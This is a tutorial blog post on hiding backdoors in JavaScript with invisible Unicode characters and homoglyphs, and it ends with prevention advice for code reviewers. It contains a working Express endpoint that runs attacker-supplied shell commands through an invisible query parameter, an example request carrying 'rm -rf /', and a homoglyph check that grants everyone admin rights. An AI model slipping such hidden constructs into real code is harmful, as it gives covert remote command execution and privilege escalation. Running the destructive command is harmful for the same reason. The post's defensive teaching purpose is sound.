Backdoor in JavaScript Applications through Invisible Character Attacks and Homoglyph Attacks

Daily short news for you

Zed is probably the most user-centric developer community on the planet. Recently, they added an option to disable all AI features in Zed. While many others are looking to integrate deeper and do more with AI Agents. Truly a bold move 🤔

You Can Now Disable All AI Features in Zed

» Read more
Today I have tried to walk a full 8k steps in one session to show you all. As expected, the time spent walking reached over 1 hour and the distance was around 6km 🤓

Oh, in a few days it will be the end of the month, which means it will also mark one month since I started the habit of walking every day with the goal of 8k steps. At the beginning of next month, I will summarize and see how it goes.

» Read more
It's been a long time since I've read such a heartfelt article The many, many, many JavaScript runtimes of the last decade. In the article, the author recounts the journey of the development of the JavaScript runtime environment, noting that today we have and are seeing JavaScript present in many areas. Additionally, the author also touches on a lot of peripheral knowledge; just a little reading opens up so many new discoveries 🤓

» Read more

Problem

A backdoor is a method to bypass regular authentication or create a "secret entrance" to remotely access a software system without typical authentication. Backdoors attempt to avoid detection through common monitoring methods like code reviews, logging, etc. Imagine being responsible for developing an API system and cleverly creating an endpoint that no one knows about except you, allowing you to easily steal user information.

Because of this, backdoors can cause serious damage to a system due to their "hidden" nature and difficulty to detect. No one knows if a backdoor exists in their system, whether it is stealing or modifying data. In summary, creating an undetectable backdoor is not easy, but once it bypasses detection, the damage is unimaginable.

As a code writer, you may unintentionally or intentionally create a backdoor in the application you are developing using some "extremely clever" techniques that I am going to describe below. Of course, if you are a code reviewer, you should also be aware of these practices to "expose" these highly condemnable actions.

Invisible Character Attacks

The character "ㅤ" (equivalent to 0x3164 in hexadecimal) is called "HANGUL FILLER". At first glance, it looks like a harmless space or whitespace, hence it is called an "invisible" character. But in reality, this character is considered a letter, so it can be used to name a variable in JavaScript.

const ㅤ = "hello world";
console.log(ㅤ); // hello world

Taking advantage of this property, it can be cleverly used in cases like the following.

const express = require("express");
const util = require("util");
const exec = util.promisify(require("child_process").exec);

const app = express();

app.get("/network_health", async (req, res) => {
  const { timeout, ㅤ } = req.query;
  const checkCommands = [
    "ping -c 1 google.com",  
    "curl -s http://example.com/",ㅤ
  ];

  try {
    await Promise.all(
      checkCommands.map(
        (cmd) => cmd && exec(cmd, { timeout: +timeout || 5_000 })
      )
    );
    res.status(200);
    res.send("ok");
  } catch (e) {
    res.status(500);
    res.send("failed");
  }
});

app.listen(8080);

At first glance, this is an API with only one endpoint, /network_health. When called, it executes 2 commands ping and curl. Take a moment to see if you can spot anything unusual in the code snippet above.

Look at line 8:

const { timeout, ㅤ } = req.query;

It seems that there is something after the timeout variable. Yes, it is the "HANGUL FILLER" character. This means that the attacker is trying to declare a variable as the "HANGUL FILLER" character.

Continuing to line 11. After the comma at the end of the line, it appears to end, but in fact, there is the declared "HANGUL FILLER" variable. So if there is an "HANGUL FILLER" attribute in req.query, that command will be executed.

A query to the endpoint with the backdoor might look like this:

GET - /network_health?%E3%85%A4%3Drm%20-rf%20%2F

In a more readable form, it is equivalent to:

GET - /network_health?ㅤ = rm -rf /

This means that the command rm -rf / is executed, which will delete the entire server.

Homoglyph Attacks

Homoglyph Attacks are a type of attack that uses Unicode characters that closely resemble operators. This causes confusion about a logical operation that may seem normal but is actually not.

const [ENV_PROD, ENV_DEV] = ["PRODUCTION", "DEVELOPMENT"];

const environment = "PRODUCTION";

function isUserAdmin(user) {
  if ((environmentǃ=ENV_PROD)) {
    return true;
  }

  return false;
}

The isUserAdmin function checks whether a user is an admin or not based on the environment variable environment. If environment is not "PRODUCTION", then everyone is assumed to be an admin.

The idea is there, but look at line 6.

if ((environmentǃ=ENV_PROD)) {

In reality, the character "ǃ" is not the "!" symbol in the logical expression, but it is a Unicode character that closely resembles the "interrobang" symbol. Therefore, the expression in this if statement is no longer a logical operation, but an assignment environmentǃ = ENV_PROD. Thus, if is always true, and all users, regardless of the environment, are considered admins.

There are many other characters that resemble characters used in the code that can be used similarly to the above case. For example: "／", "−", "＋", "⩵", "❨", "⫽", "꓿", "∗". Unicode calls these characters "confusables".

How to Prevent?

Using Unicode to create backdoors is not a new idea. However, these tricks are compact, confusing, and flawed. That's why you need to be aware of their existence to increase vigilance.

You should keep these tricks in mind when performing code reviews for unknown or untrusted contributors. This is particularly relevant for open-source projects as they are often contributed to by "completely unknown" developers.

If possible, only use characters in the ASCII character set. Many development teams choose English as their primary development language. Set up tools to warn against code that doesn't adhere to the rules to limit these types of attacks.

VSCode has released a feature in the 1.63 update that highlights invisible characters and confusing characters: https://code.visualstudio.com/updates/v1_63#_unicode-highlighting.

Unicode is also forming a task force to investigate source code spoofing issues: http://blog.unicode.org/2022/03/avoiding-source-code-spoofing.html.

References:

Premium

The secret stack of Blog

As a developer, are you curious about the technology secrets or the technical debts of this blog? All secrets will be revealed in the article below. What are you waiting for, click now!

View all

Backdoor in JavaScript Applications through Invisible Character Attacks and Homoglyph Attacks

Problem

Invisible Character Attacks

Homoglyph Attacks

How to Prevent?

Upgrade to Premium

Premium

Premium Plus

Premium